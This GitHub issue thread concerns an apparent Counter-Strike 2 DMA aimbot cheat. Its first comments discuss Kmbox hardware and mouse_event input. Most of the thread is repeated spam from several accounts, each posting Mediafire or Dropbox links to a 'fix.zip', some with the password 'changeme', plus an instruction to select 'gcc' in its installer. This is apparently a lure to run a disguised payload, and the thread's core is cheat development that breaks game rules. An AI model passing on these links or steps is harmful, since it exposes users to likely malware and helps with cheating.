### ISSUE TITLE
Wow nice release :)

### ISSUE THREAD

**Issue by eden13378** [Enoouo/Pro-CS2_DMA#1]

**Comment by Enoouo** [comment]
I mentioned in the release notes that it temporarily only supports Kmbox net. If it fails to connect, the process won't continue. I will fix this soon. So, do you not have any Kmbox? What method do you want to use to use the aimbot?

**Comment by Enoouo** [comment]
> 这是一个伟大的项目！干得好。对于非 kmbox 用户来说，鼠标事件可能是最安全的选择。

Are you referring to this method: `mouse_event(MOUSEEVENTF_MOVE, x, y, 0, 0);`?

**Comment by Enoouo** [comment]
> @Enoouo this is a great project! good job. A mouse event would prob be the safest option for non kmbox users.

Are you referring to this method: `mouse_event(MOUSEEVENTF_MOVE, x, y, 0, 0);`?

**Comment by Enoouo** [comment]
> > > > > @Enoouo this is a great project! good job. A mouse event would prob be the safest option for non kmbox users.
> > > > 
> > > > 
> > > > Are you referring to this method: ?`mouse_event(MOUSEEVENTF_MOVE, x, y, 0, 0);`
> > > 
> > > 
> > > yep
> > 
> > 
> > Can calling mouse movement on PC B affect PC A?
> 
> You can separate types of aiming (kmboxbpro, kmboxnet, mouse event) for 2 PC setups and 1 PC setup

     What? I thought I misunderstood your previous replies, but it turns out you are really using a DMA with one PC. So, are you playing on Valve official match?
     
 Okay, I'll add that mode for you.

**Comment by Enoouo** [comment]
fix

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
